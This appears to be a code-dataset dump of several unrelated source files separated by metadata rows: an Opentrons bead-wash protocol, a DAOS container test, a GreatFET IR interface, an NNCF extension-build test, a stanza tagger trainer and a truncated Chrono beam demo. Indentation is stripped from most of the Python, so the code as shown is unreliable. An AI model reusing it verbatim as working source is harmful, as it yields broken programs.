t1 = threading.Thread(target=turn_on_blinking_notification, args=(ctx._hw_manager.hardware, cancel_token))
t1.start()
return t1
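# Usage sketch for the helpers above (it mirrors the commented-out blocks
# further down in this protocol; run it around a pause that needs attention):
#   cancellationToken = CancellationToken()
#   cancellationToken.set_true()
#   thread = create_thread(ctx, cancellationToken)
#   ctx.pause('Please empty the trash before resuming.')
#   cancellationToken.set_false()
#   thread.join()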
# Start protocol
def run(ctx):
# Setup for flashing lights notification to empty trash
# cancellationToken = CancellationToken()
# load labware and pipettes
num_cols = math.ceil(NUM_SAMPLES/8)
tips300 = [ctx.load_labware('starlab_96_tiprack_300ul', slot, '200µl filtertiprack')
for slot in ['3', '6', '8', '9', '7']]
if PARK:
parkingrack = ctx.load_labware(
'starlab_96_tiprack_300ul', '10', 'empty tiprack for parking')
if POOL:
parking_spots = parkingrack.rows()[0]
else:
parking_spots = parkingrack.rows()[0][:num_cols]
else:
tips300.insert(0, ctx.load_labware('starlab_96_tiprack_300ul', '10',
'200µl filtertiprack'))
parking_spots = [None for none in range(12)]
m300 = ctx.load_instrument(
'p300_multi_gen2', 'left', tip_racks=tips300)
magdeck = ctx.load_module('magnetic module gen2', '4')
magdeck.disengage()
magheight = 6.5
magplate = magdeck.load_labware('nest_96_wellplate_2ml_deep')
# magplate = magdeck.load_labware('biorad_96_wellplate_200ul_pcr')
tempdeck = ctx.load_module('Temperature Module Gen2', '1')
flatplate = tempdeck.load_labware(
'opentrons_96_aluminumblock_nest_wellplate_100ul',)
waste = ctx.load_labware('nest_1_reservoir_195ml', '11',
'Liquid Waste').wells()[0].top()
etoh = ctx.load_labware(
'nest_1_reservoir_195ml', '2', 'EtOH reservoir').wells()[0:]
res1 = ctx.load_labware(
'nest_12_reservoir_15ml', '5', 'reagent reservoir 1')
wash1 = res1.wells()[:4]
elution_solution = res1.wells()[-1]
if POOL:
mag_samples_m = magplate.rows()[0][:num_cols] + magplate.rows()[0][8:8+math.ceil(num_cols/2)]
elution_samples_m = flatplate.rows()[0][:num_cols] + flatplate.rows()[0][8:8+math.ceil(num_cols/2)]
else:
mag_samples_m = magplate.rows()[0][:num_cols]
elution_samples_m = flatplate.rows()[0][:num_cols]
magdeck.disengage() # just in case
#tempdeck.set_temperature(20)
m300.flow_rate.aspirate = 50
m300.flow_rate.dispense = 150
m300.flow_rate.blow_out = 300
folder_path = '/data/B'
tip_file_path = folder_path + '/tip_log.json'
tip_log = {'count': {}}
if TIP_TRACK and not ctx.is_simulating():
if os.path.isfile(tip_file_path):
with open(tip_file_path) as json_file:
data = json.load(json_file)
if 'tips300' in data:
tip_log['count'][m300] = data['tips300']
else:
tip_log['count'][m300] = 0
else:
tip_log['count'][m300] = 0
else:
tip_log['count'] = {m300: 0}
tip_log['tips'] = {
m300: [tip for rack in tips300 for tip in rack.rows()[0]]}
tip_log['max'] = {m300: len(tip_log['tips'][m300])}
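    # tip_log keeps a per-pipette tip counter so a run can resume where it left
    # off; with TIP_TRACK enabled the counter is read from tip_log.json, whose
    # expected shape is e.g. {"tips300": 16} (illustrative value).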
def pick_up(pip, loc=None):
nonlocal tip_log
if tip_log['count'][pip] == tip_log['max'][pip] and not loc:
ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \
resuming.')
pip.reset_tipracks()
tip_log['count'][pip] = 0
if loc:
pip.pick_up_tip(loc)
else:
pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]])
tip_log['count'][pip] += 1
switch = True
drop_count = 0
drop_threshold = 240 # number of tips trash will accommodate before prompting user to empty
def drop(pip):
nonlocal switch
nonlocal drop_count
side = 30 if switch else -18
drop_loc = ctx.loaded_labwares[12].wells()[0].top().move(
Point(x=side))
pip.drop_tip(drop_loc)
switch = not switch
drop_count += 8
if drop_count == drop_threshold:
# Setup for flashing lights notification to empty trash
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty tips from waste before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
drop_count = 0
waste_vol = 0
waste_threshold = 185000
def remove_supernatant(vol, park=False):
def waste_track(vol):
nonlocal waste_vol
if waste_vol + vol >= waste_threshold:
# Setup for flashing lights notification to empty liquid waste
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty liquid waste (slot 11) before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
waste_vol = 0
waste_vol += vol
m300.flow_rate.aspirate = 30
num_trans = math.ceil(vol/200)
vol_per_trans = vol/num_trans
for m, spot in zip(mag_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
            loc = m.bottom(0.8).move(Point(x=side*2.5)) # changed from 0.5->0.8, 3->2.5
for _ in range(num_trans):
waste_track(vol_per_trans)
if m300.current_volume > 0:
m300.dispense(m300.current_volume, m.top()) # void air gap if necessary
m300.move_to(m.center())
m300.transfer(vol_per_trans, loc, waste, new_tip='never',
air_gap=10)
#m300.blow_out(waste)
m300.air_gap(10)
drop(m300)
        m300.flow_rate.aspirate = 50 # changed from 150
def wash(wash_vol, source, mix_reps, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_vol/200)
vol_per_trans = wash_vol/num_trans
wash_vol_rem = wash_vol
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
            loc = m.bottom(0.8).move(Point(x=side*2.5)) # changed from 0.5->0.8, 3->2.5
src = source[i//(12//len(source))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source
m300.air_gap(20)
m300.mix(mix_reps, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_vol_rem+40, park=park) #+40
def wash_etoh(wash_etoh_vol, source_etoh, mix_reps_etoh, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_etoh_vol/200)
vol_per_trans = wash_etoh_vol/num_trans
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
            loc = m.bottom(0.5).move(Point(x=side*2.5)) # changed from 0.5, 3->2.5
src = source_etoh[i//(12//len(source_etoh))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source_etoh
m300.air_gap(20)
m300.mix(mix_reps_etoh, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_etoh_vol+40, park=park) #+40
def elute(vol, park=True):
# resuspend beads in elution
for m, spot in zip(mag_samples_m, parking_spots):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
            loc = m.bottom(0.8).move(Point(x=side*2.5)) # changed from 0.5->0.8, 3->2.5
m300.aspirate(vol, elution_solution)
m300.move_to(m.center())
m300.dispense(vol, loc)
m300.mix(10, 0.8*vol, loc)
m300.blow_out(m.bottom(5))
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
ctx.delay(minutes=5, msg='Incubating off magnet at room temperature \
for 5 minutes')
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on magnet at room temperature \
for 5 minutes')
for m, e, spot in zip(mag_samples_m, elution_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
            loc = m.bottom(0.8).move(Point(x=side*2.5)) # changed from 0.5->0.8, 3->2.5
m300.transfer(40, loc, e.bottom(5), air_gap=20, new_tip='never')
m300.blow_out(e.top(-2))
m300.air_gap(20)
m300.drop_tip()
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
# remove initial supernatant
m300.flow_rate.aspirate = 50
remove_supernatant(STARTING_VOL, park=PARK)
wash(WASH_VOL, wash1, 15, park=PARK)
#m300.flow_rate.aspirate = 94
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
magdeck.disengage()
ctx.delay(minutes=5, msg='Airdrying beads at room temperature for 5 \
minutes.')
m300.flow_rate.aspirate = 50
elute(ELUTION_VOL, park=PARK)
| 36.808642 | 110 | 0.582425 |
0177fcebd2550e61c6175ef81214f68f254fa7f3 | 6,740 | py | Python | src/tests/ftest/container/Open.py | JohnMalmberg/daos | 81a0e41a538aee4b998ec5101a66bb2b3ddecb6a | ["Apache-2.0"] | null | null | null | src/tests/ftest/container/Open.py | JohnMalmberg/daos | 81a0e41a538aee4b998ec5101a66bb2b3ddecb6a | ["Apache-2.0"] | 1 | 2018-10-22T17:06:02.000Z | 2018-10-29T05:08:00.000Z | src/tests/ftest/container/Open.py | JohnMalmberg/daos | 81a0e41a538aee4b998ec5101a66bb2b3ddecb6a | ["Apache-2.0"] | null | null | null |
#!/usr/bin/python
'''
(C) Copyright 2018 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
import os
import time
import traceback
import sys
import json
import uuid
from avocado import Test
from avocado import main
from avocado.utils import process
sys.path.append('./util')
sys.path.append('../util')
sys.path.append('../../../utils/py')
sys.path.append('./../../utils/py')
import ServerUtils
import WriteHostFile
from daos_api import DaosContext
from daos_api import DaosPool
from daos_api import DaosContainer
from daos_api import RankList
class OpenContainerTest(Test):
"""
Tests DAOS container bad create (non existing pool handle, bad uuid)
and close.
:avocado: tags=container,containeropen
"""
def setUp(self):
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as f:
build_paths = json.load(f)
self.basepath = os.path.normpath(build_paths['PREFIX'] + "/../")
self.tmp = build_paths['PREFIX'] + '/tmp'
self.server_group = self.params.get("server_group",'/server/',
'daos_server')
# setup the DAOS python API
self.Context = DaosContext(build_paths['PREFIX'] + '/lib/')
self.POOL1 = None
self.POOL2 = None
self.CONTAINER1 = None
self.CONTAINER2 = None
self.hostfile = None
self.hostlist = self.params.get("test_machines",'/run/hosts/*')
self.hostfile = WriteHostFile.WriteHostFile(self.hostlist, self.tmp)
# common parameters used in pool create
self.createmode = self.params.get("mode",'/run/createtests/createmode/')
self.createsetid = self.params.get("setname",'/run/createtests/createset/')
self.createsize = self.params.get("size",'/run/createtests/createsize/')
# POOL 1 UID GID
self.createuid1 = self.params.get("uid",'/run/createtests/createuid1/')
self.creategid1 = self.params.get("gid",'/run/createtests/creategid1/')
# POOL 2 UID GID
self.createuid2 = self.params.get("uid",'/run/createtests/createuid2/')
self.creategid2 = self.params.get("gid",'/run/createtests/creategid2/')
ServerUtils.runServer(self.hostfile, self.server_group, self.basepath)
# give it time to start
time.sleep(2)
def tearDown(self):
if self.CONTAINER1 is not None:
self.CONTAINER1.destroy();
if self.CONTAINER2 is not None:
self.CONTAINER2.destroy();
if self.POOL1 is not None and self.POOL1.attached:
self.POOL1.destroy(1)
if self.POOL2 is not None and self.POOL2.attached:
self.POOL2.destroy(1)
ServerUtils.stopServer()
def test_container_open(self):
"""
Test basic container bad create.
:avocado: tags=container,containeropen
"""
expected_for_param = []
uuidlist = self.params.get("uuid",'/run/createtests/uuids/*/')
containerUUID = uuidlist[0]
expected_for_param.append(uuidlist[1])
pohlist = self.params.get("poh",'/run/createtests/handles/*/')
poh = pohlist[0]
expected_for_param.append(pohlist[1])
expected_result = 'PASS'
for result in expected_for_param:
if result == 'FAIL':
expected_result = 'FAIL'
break
try:
# create two pools and try to create containers in these pools
self.POOL1 = DaosPool(self.Context)
self.POOL1.create(self.createmode, self.createuid1, self.creategid1,
self.createsize, self.createsetid, None)
self.POOL2 = DaosPool(self.Context)
self.POOL2.create(self.createmode, self.createuid2, self.creategid2,
self.createsize, None, None)
# Connect to the pools
self.POOL1.connect(1 << 1)
self.POOL2.connect(1 << 1)
# defines pool handle for container open
if pohlist[0] == 'POOL1':
poh = self.POOL1.handle
else:
poh = self.POOL2.handle
# Create a container in POOL1
self.CONTAINER1 = DaosContainer(self.Context)
self.CONTAINER1.create(self.POOL1.handle)
# defines test UUID for container open
if uuidlist[0] == 'POOL1':
struuid = self.CONTAINER1.get_uuid_str()
containerUUID = uuid.UUID(struuid)
else:
if uuidlist[0] == 'MFUUID':
containerUUID = "misformed-uuid-0000"
else:
containerUUID = uuid.uuid4() # random uuid
# tries to open the container1
# open should be ok only if poh = POOL1.handle && containerUUID = CONTAINER1.uuid
self.CONTAINER1.open(poh, containerUUID)
# wait a few seconds and then destroy containers
time.sleep(5)
self.CONTAINER1.close()
self.CONTAINER1.destroy()
self.CONTAINER1 = None
# cleanup the pools
self.POOL1.disconnect()
self.POOL1.destroy(1)
self.POOL1 = None
self.POOL2.disconnect()
self.POOL2.destroy(1)
self.POOL2 = None
if expected_result in ['FAIL']:
self.fail("Test was expected to fail but it passed.\n")
except Exception as e:
print e
print traceback.format_exc()
if expected_result == 'PASS':
self.fail("Test was expected to pass but it failed.\n")
finally:
if self.hostfile is not None:
os.remove(self.hostfile)
if __name__ == "__main__":
main()
| 34.742268 | 93 | 0.617062 |
4157d0fb6b97e8d4648b6a9527374ba6e8e43f4a | 1,097 | py | Python | host/greatfet/interfaces/sdir.py | hewittc/greatfet | 9e9dfb9c0af476457d41731d5bfe483f8928a49d | ["BSD-3-Clause"] | 2 | 2019-11-07T01:09:14.000Z | 2020-10-31T06:10:49.000Z | host/greatfet/interfaces/sdir.py | hewittc/greatfet | 9e9dfb9c0af476457d41731d5bfe483f8928a49d | ["BSD-3-Clause"] | null | null | null | host/greatfet/interfaces/sdir.py | hewittc/greatfet | 9e9dfb9c0af476457d41731d5bfe483f8928a49d | ["BSD-3-Clause"] | 1 | 2021-06-26T06:05:10.000Z | 2021-06-26T06:05:10.000Z |
#
# This file is part of GreatFET
#
import array
import usb
from ..interface import GreatFETInterface
from greatfet.protocol import vendor_requests
class SDIRTransceiver(GreatFETInterface):
"""
Data source for scanning out software-defined IR data.
"""
USB_TIMEOUT_ERRNO = 110
def __init__(self, board):
self.board = board
self.api = board.apis.sdir
self.running = False
def start_receive(self):
self.api.start_receive()
self.running = True
def stop(self):
self.api.stop()
self.running = False
def read(self, timeout=1000, max_data=0x4000, autostart=False, allow_timeout=False):
""" Reads all available samples from the GreatFET. """
if not self.running and autostart:
self.start_receive()
try:
return self.board.comms.device.read(0x81, max_data, timeout=timeout)
except usb.core.USBError as e:
if (e.errno == self.USB_TIMEOUT_ERRNO) and allow_timeout:
return None
else:
raise
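# A minimal usage sketch (illustrative only; `board` stands for an already
# connected GreatFET board object and `process_samples` is a hypothetical
# consumer of the raw sample buffer):
#   sdir = SDIRTransceiver(board)
#   data = sdir.read(autostart=True, allow_timeout=True)
#   if data is not None:
#       process_samples(data)
#   sdir.stop()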
| 21.94 | 88 | 0.62443 |
74fddb0ba016fed5f282df528360621ea913a9b1 | 3,216 | py | Python | tests/test_extensions_build.py | l-bat/nncf | 6258916cd5fa7fc010ad09da63113354358bffd8 | ["Apache-2.0"] | null | null | null | tests/test_extensions_build.py | l-bat/nncf | 6258916cd5fa7fc010ad09da63113354358bffd8 | ["Apache-2.0"] | null | null | null | tests/test_extensions_build.py | l-bat/nncf | 6258916cd5fa7fc010ad09da63113354358bffd8 | ["Apache-2.0"] | null | null | null |
import os
import subprocess
import pytest
import pathlib
import shutil
import torch
from tests.conftest import TEST_ROOT
from tests.test_sanity_sample import Command
EXTENSIONS_BUILD_FILENAME = 'extensions_build_checks.py'
@pytest.mark.parametrize("venv_type, package_type,install_type",
[('venv', 'develop', 'GPU')])
def test_force_cuda_build(tmp_venv_with_nncf, install_type, tmp_path, package_type):
'''
    Check that CUDA extensions weren't initially built, and that they are then
    forced to be built when TORCH_CUDA_ARCH_LIST is set.
'''
cuda_home = os.environ.get('CUDA_HOME') or os.environ.get('CUDA_PATH')
if cuda_home is None:
try:
nvcc = subprocess.check_output(['which', 'nvcc'])
cuda_home = os.path.dirname(os.path.dirname(nvcc))
except subprocess.CalledProcessError:
if not cuda_home:
cuda_home = '/usr/local/cuda'
if not os.path.exists(cuda_home):
cuda_home = None
if not cuda_home and not torch.cuda.is_available():
pytest.skip('There is no CUDA on the machine. The test will be skipped')
venv_path = tmp_venv_with_nncf
torch_build_dir = tmp_path / 'extensions'
export_env_variables = "export CUDA_VISIBLE_DEVICES='' export TORCH_EXTENSIONS_DIR={}".format(torch_build_dir)
python_executable_with_venv = ". {0}/bin/activate && {1} && {0}/bin/python".format(venv_path, export_env_variables)
run_path = tmp_path / 'run'
shutil.copy(TEST_ROOT / EXTENSIONS_BUILD_FILENAME, run_path)
torch_ext_dir = pathlib.Path(torch_build_dir)
assert not torch_ext_dir.exists()
mode = 'cpu'
command = Command("{} {}/extensions_build_checks.py {}".format(python_executable_with_venv, run_path, mode),
path=run_path)
command.run()
cpu_ext_dir = (torch_ext_dir / 'quantized_functions_cpu')
assert cpu_ext_dir.exists()
cpu_ext_so = (cpu_ext_dir / 'quantized_functions_cpu.so')
assert cpu_ext_so.exists()
cuda_ext_dir = (torch_ext_dir / 'quantized_functions_cuda')
assert not cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'quantized_functions_cuda.so')
assert not cuda_ext_so.exists()
cpu_ext_dir = (torch_ext_dir / 'binarized_functions_cpu')
assert cpu_ext_dir.exists()
cpu_ext_so = (cpu_ext_dir / 'binarized_functions_cpu.so')
assert cpu_ext_so.exists()
cuda_ext_dir = (torch_ext_dir / 'binarized_functions_cuda')
assert not cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'binarized_functions_cuda.so')
assert not cuda_ext_so.exists()
mode = 'cuda'
command = Command("{} {}/extensions_build_checks.py {}".format(python_executable_with_venv, run_path, mode),
path=run_path)
command.run()
cuda_ext_dir = (torch_ext_dir / 'quantized_functions_cuda')
assert cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'quantized_functions_cuda.so')
assert cuda_ext_so.exists()
cuda_ext_dir = (torch_ext_dir / 'binarized_functions_cuda')
assert cuda_ext_dir.exists()
cuda_ext_so = (cuda_ext_dir / 'binarized_functions_cuda.so')
assert cuda_ext_so.exists()
| 35.733333 | 119 | 0.699938 |
0f3c5e55c0beb4a6904721a5ebaac967ed98eb25 | 6,019 | py | Python | stanza/models/pos/trainer.py | vivkvv/stanza | d30d396950c94499aa4897e2a3539ec720682253 | ["Apache-2.0"] | null | null | null | stanza/models/pos/trainer.py | vivkvv/stanza | d30d396950c94499aa4897e2a3539ec720682253 | ["Apache-2.0"] | null | null | null | stanza/models/pos/trainer.py | vivkvv/stanza | d30d396950c94499aa4897e2a3539ec720682253 | ["Apache-2.0"] | null | null | null |
"""
A trainer class to handle training and testing of models.
"""
import sys
import logging
import torch
from torch import nn
from stanza.models.common.trainer import Trainer as BaseTrainer
from stanza.models.common import utils, loss
from stanza.models.pos.model import Tagger
from stanza.models.pos.vocab import MultiVocab
import onnx
import onnxruntime
logger = logging.getLogger('stanza')
def unpack_batch(batch, use_cuda):
""" Unpack a batch from the data loader. """
if use_cuda:
inputs = [b.cuda() if b is not None else None for b in batch[:8]]
else:
inputs = batch[:8]
orig_idx = batch[8]
word_orig_idx = batch[9]
sentlens = batch[10]
wordlens = batch[11]
return inputs, orig_idx, word_orig_idx, sentlens, wordlens
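# Note on the batch layout assumed above: batch[0:8] are the padded input
# tensors (word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats,
# pretrained), batch[8] and batch[9] are the original sentence and word sort
# indices, and batch[10]/batch[11] are the sentence and word lengths.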
class Trainer(BaseTrainer):
""" A trainer for training models. """
def __init__(self, args=None, vocab=None, pretrain=None, model_file=None, use_cuda=False):
self.use_cuda = use_cuda
if model_file is not None:
# load everything from file
self.model_file = model_file
self.load(model_file, pretrain)
else:
# build model from scratch
self.args = args
self.vocab = vocab
self.model = Tagger(args, vocab, emb_matrix=pretrain.emb if pretrain is not None else None, share_hid=args['share_hid'])
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
if self.use_cuda:
self.model.cuda()
else:
self.model.cpu()
self.optimizer = utils.get_optimizer(self.args['optim'], self.parameters, self.args['lr'], betas=(0.9, self.args['beta2']), eps=1e-6)
def update(self, batch, eval=False):
inputs, orig_idx, word_orig_idx, sentlens, wordlens = unpack_batch(batch, self.use_cuda)
word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained = inputs
if eval:
self.model.eval()
else:
self.model.train()
self.optimizer.zero_grad()
loss, _ = self.model(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens)
loss_val = loss.data.item()
if eval:
return loss_val
loss.backward()
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args['max_grad_norm'])
self.optimizer.step()
return loss_val
def predict(self, batch, unsort=True):
inputs, orig_idx, word_orig_idx, sentlens, wordlens = unpack_batch(batch, self.use_cuda)
word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained = inputs
self.model.eval()
batch_size = word.size(0)
# export to onnx
onnx_export_file_name = self.model_file + ".onnx"
torch.onnx.export(
self.model,
(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens),
onnx_export_file_name,
export_params = True,
opset_version=9,
do_constant_folding=True,
input_names=['input'],
output_names=['output'],
dynamic_axes={
'input': {0: 'batch_size'},
'output': {0: 'batch_size'}
}
)
onnx_model = onnx.load(onnx_export_file_name)
onnx.checker.check_model(onnx_model)
_, preds = self.model(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens)
upos_seqs = [self.vocab['upos'].unmap(sent) for sent in preds[0].tolist()]
xpos_seqs = [self.vocab['xpos'].unmap(sent) for sent in preds[1].tolist()]
feats_seqs = [self.vocab['feats'].unmap(sent) for sent in preds[2].tolist()]
pred_tokens = [[[upos_seqs[i][j], xpos_seqs[i][j], feats_seqs[i][j]] for j in range(sentlens[i])] for i in range(batch_size)]
if unsort:
pred_tokens = utils.unsort(pred_tokens, orig_idx)
return pred_tokens
def save(self, filename, skip_modules=True):
model_state = self.model.state_dict()
# skip saving modules like pretrained embeddings, because they are large and will be saved in a separate file
if skip_modules:
skipped = [k for k in model_state.keys() if k.split('.')[0] in self.model.unsaved_modules]
for k in skipped:
del model_state[k]
params = {
'model': model_state,
'vocab': self.vocab.state_dict(),
'config': self.args
}
try:
torch.save(params, filename, _use_new_zipfile_serialization=False)
logger.info("Model saved to {}".format(filename))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
logger.warning(f"Saving failed... {e} continuing anyway.")
def load(self, filename, pretrain):
"""
Load a model from file, with preloaded pretrain embeddings. Here we allow the pretrain to be None or a dummy input,
and the actual use of pretrain embeddings will depend on the boolean config "pretrain" in the loaded args.
"""
try:
checkpoint = torch.load(filename, lambda storage, loc: storage)
except BaseException:
logger.error("Cannot load model from {}".format(filename))
raise
self.args = checkpoint['config']
self.vocab = MultiVocab.load_state_dict(checkpoint['vocab'])
# load model
emb_matrix = None
if self.args['pretrain'] and pretrain is not None: # we use pretrain only if args['pretrain'] == True and pretrain is not None
emb_matrix = pretrain.emb
self.model = Tagger(self.args, self.vocab, emb_matrix=emb_matrix, share_hid=self.args['share_hid'])
self.model.load_state_dict(checkpoint['model'], strict=False)
| 41.226027 | 141 | 0.629174 |
818129558bddbc0505e05a60216047b21343fd82 | 10,725 | py | Python | src/demos/python/fea/demo_FEA_beams_constr.py | Benatti1991/chrono | d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf | [
"BSD-3-Clause"
] | 1,383 | 2015-02-04T14:17:40.000Z | 2022-03-30T04:58:16.000Z | src/demos/python/fea/demo_FEA_beams_constr.py | Benatti1991/chrono | d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf | [
"BSD-3-Clause"
] | 245 | 2015-01-11T15:30:51.000Z | 2022-03-30T21:28:54.000Z | src/demos/python/fea/demo_FEA_beams_constr.py | Benatti1991/chrono | d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf | [
"BSD-3-Clause"
] | 351 | 2015-02-04T14:17:47.000Z | 2022-03-30T04:42:52.000Z | # =============================================================================
# PROJECT CHRONO - http:#projectchrono.org
#
# Copyright (c) 2014 projectchrono.org
# All rights reserved.
#
# Use of this source code is governed by a BSD-style license that can be found
# in the LICENSE file at the top level of the distribution and at
# http:#projectchrono.org/license-chrono.txt.
#
# =============================================================================
# Authors: Simone Benatti
# =============================================================================
#
# FEA for 3D beams and constraints
#
# =============================================================================
import math as m
import pychrono as chrono
import pychrono.fea as fea
import pychrono.pardisomkl as pardiso
import pychrono.irrlicht as chronoirr
import os
# Create a motor between the truss and the crank:
class ChFunction_myf (chrono.ChFunction):
def __init__(self):
chrono.ChFunction.__init__(self)
def Get_y(self,x):
if (x > 0.4):
return chrono.CH_C_PI
else:
return -chrono.CH_C_PI * (1.0 - m.cos(chrono.CH_C_PI * x / 0.4)) / 2.0
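# Crank motor law: a smooth raised-cosine ramp over the first 0.4 s, after which the
# angle is held (-pi and +pi describe the same crank position).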
# Output directory
out_dir = chrono.GetChronoOutputPath() + "BEAM_BUCKLING"
print( "Copyright (c) 2017 projectchrono.org \n")
# Create a Chrono::Engine physical system
my_system = chrono.ChSystemSMC()
# Create the Irrlicht visualization (open the Irrlicht device,
# bind a simple user interface, etc. etc.)
application = chronoirr.ChIrrApp(my_system, "Beams and constraints", chronoirr.dimension2du(800, 600))
# Easy shortcuts to add camera, lights, logo and sky in Irrlicht scene:
application.AddTypicalLogo()
application.AddTypicalSky()
application.AddTypicalLights()
application.AddTypicalCamera(chronoirr.vector3df(0.0, 0.6, -1.0))
L = 1
H = 0.25
K = 0.05
vA = chrono.ChVectorD(0, 0, 0)
vC = chrono.ChVectorD(L, 0, 0)
vB = chrono.ChVectorD(L, -H, 0)
vG = chrono.ChVectorD(L - K, -H, 0)
vd = chrono.ChVectorD(0, 0, 0.0001)
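# Mechanism geometry: vA-vC is the horizontal IGA beam, vC-vB the vertical Euler beam,
# vG-vB the short crank driven by the motor; vd is a tiny z-offset applied to the
# Euler-beam endpoints, apparently to keep their nodes from coinciding with the IGA beam.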
# Create a truss:
body_truss = chrono.ChBody()
body_truss.SetBodyFixed(True)
my_system.AddBody(body_truss)
# Attach a 'box' shape asset for visualization.
mboxtruss = chrono.ChBoxShape()
mboxtruss.GetBoxGeometry().Pos = chrono.ChVectorD(-0.01, 0, 0)
mboxtruss.GetBoxGeometry().SetLengths(chrono.ChVectorD(0.02, 0.2, 0.1))
body_truss.AddAsset(mboxtruss)
# Create body for crank
body_crank = chrono.ChBody()
body_crank.SetPos((vB + vG) * 0.5)
my_system.AddBody(body_crank)
# Attach a 'box' shape asset for visualization.
mboxcrank = chrono.ChBoxShape()
mboxcrank.GetBoxGeometry().Pos = chrono.ChVectorD(0, 0, 0)
mboxcrank.GetBoxGeometry().SetLengths(chrono.ChVectorD(K, 0.02, 0.02))
body_crank.AddAsset(mboxcrank)
motor = chrono.ChLinkMotorRotationAngle()
motor.Initialize(body_truss, body_crank, chrono.ChFrameD(vG))
myfun = ChFunction_myf()
motor.SetAngleFunction(myfun)
my_system.Add(motor)
# Create a FEM mesh, that is a container for groups
# of elements and their referenced nodes.
my_mesh = fea.ChMesh()
# Create the horizontal beam (use an IGA-beam finite element type, for example)
beam_wy = 0.10
beam_wz = 0.01
# Create a section for the IGA beam.
# IGA beams require ChBeamSectionCosserat sections, containing at least
# a ChElasticityCosserat and ChInertiaCosserat models, and optional ChDampingCosserat and ChPlasticityCosserat.
minertia = fea.ChInertiaCosseratSimple()
minertia.SetAsRectangularSection(beam_wy, beam_wz, 2700) # automatically sets A etc., from width, height, density
melasticity = fea.ChElasticityCosseratSimple()
melasticity.SetYoungModulus(73.0e9)
melasticity.SetGwithPoissonRatio(0.3)
melasticity.SetAsRectangularSection(beam_wy, beam_wz)
msection1 = fea.ChBeamSectionCosserat(minertia, melasticity)
msection1.SetDrawThickness(beam_wy, beam_wz)
builder_iga = fea.ChBuilderBeamIGA()
builder_iga.BuildBeam(my_mesh, # the mesh to put the elements in
msection1, # section of the beam
32, # number of sections (spans)
vA, # start point
vC, # end point
chrono.VECT_Y, # suggested Y direction of section
3) # order (3 = cubic, etc)
